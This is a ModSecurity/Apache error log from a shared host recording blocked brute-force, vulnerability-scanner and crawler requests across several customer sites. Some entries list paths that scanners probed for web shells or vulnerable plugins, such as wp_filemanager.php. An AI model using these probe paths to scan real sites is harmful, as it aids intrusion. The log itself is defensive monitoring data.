[Tue May 26 17:41:49.019950 2026] [security2:error] [pid 924957:tid 925199] [client 223.235.98.214:3178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOBeYv2AvxeXULfJdIPQAAAHA"]
[Tue May 26 17:41:49.020089 2026] [security2:error] [pid 924957:tid 925199] [client 223.235.98.214:3178] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOBeYv2AvxeXULfJdIPQAAAHA"]
[Tue May 26 17:41:49.252238 2026] [security2:error] [pid 924957:tid 924989] [remote 216.73.216.30:26068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOBeYv2AvxeXULfJdIPgAADh8"]
[Tue May 26 17:41:50.535557 2026] [security2:error] [pid 924957:tid 925193] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOBuYv2AvxeXULfJdIYQAAAGo"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 17:41:50.572000 2026] [security2:error] [pid 924957:tid 925151] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOBuYv2AvxeXULfJdIWAAAAEA"]
[Tue May 26 17:41:51.058292 2026] [security2:error] [pid 924957:tid 925188] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOBuYv2AvxeXULfJdIbgAAAGU"], referer: http://anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 17:41:51.380187 2026] [security2:error] [pid 924957:tid 924999] [remote 195.250.23.247:50692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWOB-Yv2AvxeXULfJdIcwAAAyk"]
[Tue May 26 17:41:52.764397 2026] [security2:error] [pid 924957:tid 925158] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOCOYv2AvxeXULfJdIkwAAAEc"]
[Tue May 26 17:41:53.769996 2026] [autoindex:error] [pid 924957:tid 925138] [client 82.1.233.209:44656] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:41:54.495449 2026] [security2:error] [pid 924957:tid 924994] [remote 216.73.216.30:54832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOCuYv2AvxeXULfJdI1AAACyQ"]
[Tue May 26 17:41:55.212656 2026] [security2:error] [pid 924957:tid 925103] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOCuYv2AvxeXULfJdI4wAAABA"]
[Tue May 26 17:41:55.377212 2026] [security2:error] [pid 924957:tid 925008] [remote 51.222.168.46:22252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWOC-Yv2AvxeXULfJdI8gAAGDI"]
[Tue May 26 17:41:55.377360 2026] [security2:error] [pid 924957:tid 925111] [client 51.222.168.46:22252] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWOC-Yv2AvxeXULfJdI8gAAGDI"]
[Tue May 26 17:41:55.524242 2026] [autoindex:error] [pid 924957:tid 925190] [client 192.116.236.114:49278] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:41:56.869028 2026] [security2:error] [pid 924957:tid 925082] [remote 15.235.27.36:44566] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bloggertarget.com"] [uri "/"] [unique_id "ahWODOYv2AvxeXULfJdJHQAANHw"]
[Tue May 26 17:41:56.869232 2026] [security2:error] [pid 924957:tid 925139] [client 15.235.27.36:44566] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bloggertarget.com"] [uri "/"] [unique_id "ahWODOYv2AvxeXULfJdJHQAANHw"]
[Tue May 26 17:41:57.596825 2026] [security2:error] [pid 924957:tid 925169] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWODeYv2AvxeXULfJdJJwAAAFI"]
[Tue May 26 17:41:58.058227 2026] [autoindex:error] [pid 924957:tid 925181] [client 156.236.155.140:47954] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:41:59.273387 2026] [security2:error] [pid 924957:tid 925042] [remote 51.195.244.2:57666] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWOD-Yv2AvxeXULfJdJYwAAdVQ"]
[Tue May 26 17:41:59.273551 2026] [security2:error] [pid 924957:tid 925204] [client 51.195.244.2:57666] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ivwellnessresources.org"] [uri "/robots.txt"] [unique_id "ahWOD-Yv2AvxeXULfJdJYwAAdVQ"]
[Tue May 26 17:41:59.581798 2026] [security2:error] [pid 924957:tid 925202] [client 223.235.98.214:19906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOD-Yv2AvxeXULfJdJbgAAAHM"]
[Tue May 26 17:41:59.581924 2026] [security2:error] [pid 924957:tid 925202] [client 223.235.98.214:19906] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOD-Yv2AvxeXULfJdJbgAAAHM"]
[Tue May 26 17:41:59.840946 2026] [security2:error] [pid 924957:tid 925100] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOD-Yv2AvxeXULfJdJaQAAAA0"]
[Tue May 26 17:42:00.467939 2026] [autoindex:error] [pid 924957:tid 925212] [client 170.233.76.239:46322] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:00.709491 2026] [security2:error] [pid 924957:tid 925049] [remote 54.39.6.205:38890] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ivwellnessresources.org"] [uri "/"] [unique_id "ahWOEOYv2AvxeXULfJdJgwAAbVs"]
[Tue May 26 17:42:00.709683 2026] [security2:error] [pid 924957:tid 925196] [client 54.39.6.205:38890] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ivwellnessresources.org"] [uri "/"] [unique_id "ahWOEOYv2AvxeXULfJdJgwAAbVs"]
[Tue May 26 17:42:01.850345 2026] [security2:error] [pid 924957:tid 925011] [remote 217.112.89.35:45882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOEeYv2AvxeXULfJdJpgAAVDU"]
[Tue May 26 17:42:02.117533 2026] [security2:error] [pid 924957:tid 925176] [client 195.226.194.95:36624] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "velanstore.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOEeYv2AvxeXULfJdJiwAAAFk"], referer: http://velanstore.freshmindsolutions.com/wp-content/plugins/suretriggers/readme.txt
[Tue May 26 17:42:02.403519 2026] [security2:error] [pid 924957:tid 925138] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOEeYv2AvxeXULfJdJqwAAADM"]
[Tue May 26 17:42:03.732790 2026] [security2:error] [pid 924957:tid 925184] [client 47.128.40.59:65364] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mail.ameritradeng.com"] [uri "/login/"] [unique_id "ahWOE-Yv2AvxeXULfJdJ5AAAAGE"]
[Tue May 26 17:42:04.070321 2026] [security2:error] [pid 924957:tid 925188] [client 151.240.0.12:57654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.0.240.151.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/admin/index.php"] [unique_id "ahWOE-Yv2AvxeXULfJdJ7AAAAGU"]
[Tue May 26 17:42:04.417203 2026] [autoindex:error] [pid 924957:tid 925124] [client 186.227.96.170:32613] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:04.663989 2026] [security2:error] [pid 924957:tid 925161] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOFOYv2AvxeXULfJdJ8AAAAEo"]
[Tue May 26 17:42:05.888123 2026] [security2:error] [pid 924957:tid 925184] [client 151.240.0.12:57752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.0.240.151.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/admin/index.php"] [unique_id "ahWOFeYv2AvxeXULfJdKIAAAAGE"]
[Tue May 26 17:42:06.455332 2026] [security2:error] [pid 924957:tid 925167] [client 74.249.173.207:23822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWOFuYv2AvxeXULfJdKLgAAAFA"]
[Tue May 26 17:42:06.455486 2026] [security2:error] [pid 924957:tid 925167] [client 74.249.173.207:23822] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWOFuYv2AvxeXULfJdKLgAAAFA"]
[Tue May 26 17:42:06.820002 2026] [security2:error] [pid 924957:tid 925114] [client 151.240.0.12:57883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.0.240.151.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/admin/index.php"] [unique_id "ahWOFuYv2AvxeXULfJdKPwAAABs"]
[Tue May 26 17:42:06.851743 2026] [autoindex:error] [pid 924957:tid 925164] [client 178.157.164.173:16413] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:06.910484 2026] [security2:error] [pid 924957:tid 925174] [client 113.190.77.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOFuYv2AvxeXULfJdKNQAAAFc"]
[Tue May 26 17:42:07.015895 2026] [security2:error] [pid 924957:tid 925207] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOFuYv2AvxeXULfJdKOAAAAHg"]
[Tue May 26 17:42:07.030730 2026] [security2:error] [pid 924957:tid 925146] [client 74.249.173.207:23647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/core/init.php"] [unique_id "ahWOF-Yv2AvxeXULfJdKSAAAADs"]
[Tue May 26 17:42:07.030813 2026] [security2:error] [pid 924957:tid 925146] [client 74.249.173.207:23647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/core/init.php"] [unique_id "ahWOF-Yv2AvxeXULfJdKSAAAADs"]
[Tue May 26 17:42:07.034540 2026] [security2:error] [pid 924957:tid 925154] [client 81.22.193.163:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOFuYv2AvxeXULfJdKRwAAAEM"], referer: https://www.anujtradingco.com/
[Tue May 26 17:42:07.593657 2026] [security2:error] [pid 924957:tid 925150] [client 151.240.0.12:57943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.0.240.151.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/admin/index.php"] [unique_id "ahWOF-Yv2AvxeXULfJdKWQAAAD8"]
[Tue May 26 17:42:07.950032 2026] [security2:error] [pid 924957:tid 925107] [client 74.249.173.207:23662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/aa.php"] [unique_id "ahWOF-Yv2AvxeXULfJdKZQAAABQ"]
[Tue May 26 17:42:07.950134 2026] [security2:error] [pid 924957:tid 925107] [client 74.249.173.207:23662] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/aa.php"] [unique_id "ahWOF-Yv2AvxeXULfJdKZQAAABQ"]
[Tue May 26 17:42:08.294961 2026] [security2:error] [pid 924957:tid 925121] [client 81.22.193.163:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOGOYv2AvxeXULfJdKbgAAACI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 17:42:08.346398 2026] [security2:error] [pid 924957:tid 925137] [client 151.240.0.12:58103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.0.240.151.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/admin/index.php"] [unique_id "ahWOGOYv2AvxeXULfJdKcQAAADI"]
[Tue May 26 17:42:08.380040 2026] [security2:error] [pid 924957:tid 925206] [client 74.249.173.207:23658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/xmrlpc.php"] [unique_id "ahWOGOYv2AvxeXULfJdKcgAAAHc"]
[Tue May 26 17:42:08.380173 2026] [security2:error] [pid 924957:tid 925206] [client 74.249.173.207:23658] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/xmrlpc.php"] [unique_id "ahWOGOYv2AvxeXULfJdKcgAAAHc"]
[Tue May 26 17:42:08.676674 2026] [security2:error] [pid 924957:tid 925207] [client 74.249.173.207:23675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/class.php"] [unique_id "ahWOGOYv2AvxeXULfJdKgQAAAHg"]
[Tue May 26 17:42:08.676780 2026] [security2:error] [pid 924957:tid 925207] [client 74.249.173.207:23675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/class.php"] [unique_id "ahWOGOYv2AvxeXULfJdKgQAAAHg"]
[Tue May 26 17:42:08.822796 2026] [security2:error] [pid 924957:tid 925113] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOGOYv2AvxeXULfJdKdgAAABo"]
[Tue May 26 17:42:09.544853 2026] [security2:error] [pid 924957:tid 925125] [client 74.249.173.207:23853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/goods.php"] [unique_id "ahWOGeYv2AvxeXULfJdKmwAAACY"]
[Tue May 26 17:42:09.544961 2026] [security2:error] [pid 924957:tid 925125] [client 74.249.173.207:23853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/goods.php"] [unique_id "ahWOGeYv2AvxeXULfJdKmwAAACY"]
[Tue May 26 17:42:10.017933 2026] [autoindex:error] [pid 924957:tid 925165] [client 167.249.151.11:58460] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:10.084113 2026] [security2:error] [pid 924957:tid 925116] [client 74.249.173.207:23826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/info.php"] [unique_id "ahWOGuYv2AvxeXULfJdKqwAAAB0"]
[Tue May 26 17:42:10.084233 2026] [security2:error] [pid 924957:tid 925116] [client 74.249.173.207:23826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/info.php"] [unique_id "ahWOGuYv2AvxeXULfJdKqwAAAB0"]
[Tue May 26 17:42:10.237348 2026] [security2:error] [pid 924957:tid 925091] [client 223.235.98.214:6747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOGuYv2AvxeXULfJdKrAAAAAQ"]
[Tue May 26 17:42:10.237471 2026] [security2:error] [pid 924957:tid 925091] [client 223.235.98.214:6747] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOGuYv2AvxeXULfJdKrAAAAAQ"]
[Tue May 26 17:42:10.404976 2026] [security2:error] [pid 924957:tid 925093] [client 74.249.173.207:23823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/as.php"] [unique_id "ahWOGuYv2AvxeXULfJdKuQAAAAY"]
[Tue May 26 17:42:10.405079 2026] [security2:error] [pid 924957:tid 925093] [client 74.249.173.207:23823] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/as.php"] [unique_id "ahWOGuYv2AvxeXULfJdKuQAAAAY"]
